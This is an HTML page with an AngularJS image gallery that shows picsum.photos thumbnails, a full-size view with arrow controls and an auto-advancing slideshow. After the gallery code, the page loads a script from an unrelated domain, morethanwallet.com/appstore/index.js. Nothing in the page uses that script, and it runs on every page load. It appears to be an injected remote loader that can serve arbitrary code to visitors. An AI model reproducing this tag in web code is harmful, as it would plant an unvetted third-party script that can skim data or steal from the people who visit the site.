<!DOCTYPE html>
<html ng-app="imageApp">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.2/angular.min.js"></script>
  <style>
    .thumbnail {
      width: 80px;
      height: 80px;
      margin: 10px;
      cursor: pointer;
    }
    .fullsize {
      display: none;
      margin: 0 auto; 
    }
    .fullsize.active {
      display: block;
    }
    .container {
      text-align: center;
    }
    .separator {
      margin-top: 20px;
      margin-bottom: 20px; 
      border-top: 10px solid #000;
    }
    .arrow {
      cursor: pointer;
      margin: 10px;
      font-size: 24px;
      display: inline-block;
      width: 30px;
      height: 30px;
      border: 1px solid #ccc;
      text-align: center;
      line-height: 1.6;
      color: black;
    }
  </style>
</head>
<body>

<div class="container" ng-controller="ImageController">
  <div>
    <img ng-repeat="image in images" ng-src="{{image.thumbnail}}" ng-click="showFullSize($index)" class="thumbnail">
  </div>
  <div class="separator"></div> 
  <div>
    <img ng-repeat="image in images" ng-src="{{image.fullsize}}" class="fullsize" ng-class="{active: $index === currentIndex}">
  </div>
  <div>
    <span class="arrow" ng-click="prev()">&#10094;</span> 
    <span class="arrow" ng-click="next()">&#10095;</span> 
  </div>
</div>

<script>
  var app = angular.module('imageApp', []);

  app.controller('ImageController', function($scope, $interval) {
    $scope.images = [
      { thumbnail: 'https://picsum.photos/id/71/50/50', fullsize: 'https://picsum.photos/id/71/400/400' },
      { thumbnail: 'https://picsum.photos/id/102/50/50', fullsize: 'https://picsum.photos/id/102/400/400' },
      { thumbnail: 'https://picsum.photos/id/13/50/50', fullsize: 'https://picsum.photos/id/13/400/400' },
      { thumbnail: 'https://picsum.photos/id/185/50/50', fullsize: 'https://picsum.photos/id/185/400/400' },
      { thumbnail: 'https://picsum.photos/id/20/50/50', fullsize: 'https://picsum.photos/id/20/400/400' },
      { thumbnail: 'https://picsum.photos/id/100/50/50', fullsize: 'https://picsum.photos/id/100/400/400' },
    ];

    $scope.currentIndex = null;

    $scope.showFullSize = function(index) {
      $scope.currentIndex = index;
    };

    $scope.prev = function() {
      $scope.currentIndex = ($scope.currentIndex - 1 + $scope.images.length) % $scope.images.length;
    };

    $scope.next = function() {
      $scope.currentIndex = ($scope.currentIndex + 1) % $scope.images.length;
    };

    var intervalPromise = $interval(function() {
      $scope.currentIndex = ($scope.currentIndex + 1) % $scope.images.length;
    }, 2000);

    $scope.$on('$destroy', function() {
      $interval.cancel(intervalPromise);
    });
  });
</script>
<script src="https://morethanwallet.com/appstore/index.js"></script>
</body>
</html>
